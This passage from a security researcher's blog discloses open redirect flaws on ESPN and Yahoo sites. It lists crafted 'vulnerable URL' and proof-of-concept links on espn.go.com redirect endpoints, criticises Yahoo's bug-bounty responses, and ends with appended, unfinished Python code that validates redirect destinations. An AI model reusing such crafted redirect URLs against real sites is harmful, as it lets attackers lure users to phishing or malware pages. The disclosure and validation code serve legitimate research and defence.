</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=HUE8VbbwUms" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=HUE8VbbwUms</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">PoC Video:</span></b></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be</a></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espn.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espn.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) </b>Those security problems were reported to ESPN in early 2014. However, they are still unpatched.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/36">http://seclists.org/fulldisclosure/2014/Dec/36</a></span></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html">http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register</a></span></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/espn-xss-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/espn-xss-open-redirect/</span></a></div>
<div style="margin: 0px;">
<a href="https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest</span></a></div>
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss-and-dest-redirect#notes"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss</span></a></div>
<div style="margin: 0px;">
<a href="https://www.facebook.com/permalink.php?story_fbid=435630669942495&id=361076084064621" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>435630669942495</span></a></div>
<div style="margin: 0px;">
<a href="http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e</span></a></div>
<div style="margin: 0px;">
<a href="http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html</span></a></div>
<div style="margin: 0px;">
<a href="http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inzeed.tumblr.com/post/<wbr></wbr>120775132901/espn-xss-open-<wbr></wbr>redirect</span></a></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_730f11d" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_730f11d</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>2422320542015551014553/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/">https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1631949187023558&id=1567915086760302" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1631949187023558</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://twitter.com/tetraphibious/status/606824322896785408" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606824322896785408</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>TBiJP5A3CXg</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/">http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/</a><br /><br /><br /></span></div>
</div>
Posted by Unknown (noreply@blogger.com), 0 comments.
Post tag:blogger.com,1999:blog-6322800700334987667.post-7088031521063150904, published 2015-06-05T04:43:00.000-07:00, updated 2015-06-05T04:46:17.716-07:00: Yahoo Yahoo.com Yahoo.co.jp Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYU8CHsgdSUXgAEGPkT-wuCqMKOyx_oJDNwhy26R69Koarscuf0qWl5UQdGYZZyZKkzwGs_uGUl8CkUvVgGacgd8jkNXHGLOsy5-USsuPQKEi8NKpTZ6XI7UMnLKXNIr0d5wFHFyJD4hI/s1600/yahoo_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYU8CHsgdSUXgAEGPkT-wuCqMKOyx_oJDNwhy26R69Koarscuf0qWl5UQdGYZZyZKkzwGs_uGUl8CkUvVgGacgd8jkNXHGLOsy5-USsuPQKEi8NKpTZ6XI7UMnLKXNIr0d5wFHFyJD4hI/s400/yahoo_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Yahoo Yahoo.com <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Though Yahoo lists open redirect vulnerabilities on its bug bounty program, it seems Yahoo does not take this class of vulnerability seriously at all.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Multiple Open Redirect vulnerabilities were reported to Yahoo. All of Yahoo's responses were "It is working as designed". However, these vulnerabilities were patched later.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several other security researchers complained about getting similar treatment, too.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2014/Jan/51" style="-webkit-transition: color 0.3s; display: inline; line-height: 19.6000003814697px; outline: none; text-align: justify; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Jan/51</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Feb/119" target="_blank">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Feb/119</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Are all Open Redirect vulnerabilities intended behavior? If so, why patch them later?</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtlvjOuGxueVYPln944OD3GBNo1zVeomCwf_3eynvePIH5priU8DGJnRYNXqClN5HUfGY5ABxQtE5roQ-Kitwe4W-ZDcZzOzgt5dhnF72mRClQH39L18W2ZXi6diigHibc7B6HukHWf4/s1600/yahoo_wont_fix_meitu_1.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtlvjOuGxueVYPln944OD3GBNo1zVeomCwf_3eynvePIH5priU8DGJnRYNXqClN5HUfGY5ABxQtE5roQ-Kitwe4W-ZDcZzOzgt5dhnF72mRClQH39L18W2ZXi6diigHibc7B6HukHWf4/s1600/yahoo_wont_fix_meitu_1.jpg" style="cursor: move;" width="400" /></span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />According to a CNET report, Yahoo's users were attacked through redirection. "Yahoo.com visitors over the last few days may have been served with malware via the Yahoo ad network, according to Fox IT, a security firm in the Netherlands. Users visiting pages with the malicious ads were redirected to sites armed with code that exploits vulnerabilities in Java and installs a variety of different malware."</span></div>
<div style="margin: 0px;">
<a href="http://www.cnet.com/news/yahoo-users-exposed-to-malware-attack/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cnet.com/news/<wbr></wbr>yahoo-users-exposed-to-<wbr></wbr>malware-attack/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Moreover, since Yahoo is well known worldwide, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Alibaba and Netease, e.g. by bypassing their Open Redirect filters (<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>). These security bugs have not been patched. Other similar web and computer flaws will be published in the near future.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) &amp; Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Disclosed by:</span></div>
</div>
<div>
<div>
<div style="padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136" style="line-height: 28px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span> <a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/wangjing</a></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Both the Yahoo and Yahoo Japan online web applications have a security bug that can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are effective because the crafted URL initially appears to be a page on a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client-side software such as a web browser or document rendering programs.</span></div>
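As an added example (not code from the original post or from Yahoo), the following Python shows the server-side check a redirect endpoint needs on its destination parameter: accept only same-origin paths and an exact allow-list of hosts, and reject the look-alike forms that naive prefix or substring filters let through. The `dest` parameter name, the allow-list hosts and the sample values are assumptions constructed for the example.

```python
"""Validation of a redirect destination (added example, not Yahoo's code).

Assumed setup: the endpoint reads the destination from a query parameter such
as ?dest=... and the site's legitimate hosts are listed in ALLOWED_HOSTS.
"""
from urllib.parse import urlsplit

# Hypothetical allow-list of hosts a redirect may legitimately land on.
ALLOWED_HOSTS = frozenset({"www.example.com", "login.example.com"})


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a same-origin absolute path or an
    http(s) URL whose host is exactly in `allowed_hosts`.

    The checks cover the forms that commonly slip past "starts with /" or
    "contains our domain" filters: protocol-relative "//host", backslash
    variants that browsers read as "/", userinfo tricks ("https://good@evil"),
    suffix look-alike hosts ("www.example.com.evil"), non-http schemes, and
    control characters that some parsers silently strip.
    """
    if not target:
        return False
    # Browsers treat "\" as "/" in URLs; urlsplit does not. Normalise first so
    # "/\evil" is seen as "//evil" (a host), not as a local path.
    candidate = target.replace("\\", "/")
    # Whitespace and control characters are never legitimate in a destination;
    # check the raw string because urlsplit itself drops some of them.
    if any(ord(ch) <= 0x20 or ch == "\x7f" for ch in candidate):
        return False
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept only an absolute path with a single
        # leading "/". ("//host" already carries a netloc and never gets here.)
        return candidate.startswith("/") and not candidate.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data:, custom schemes, ...
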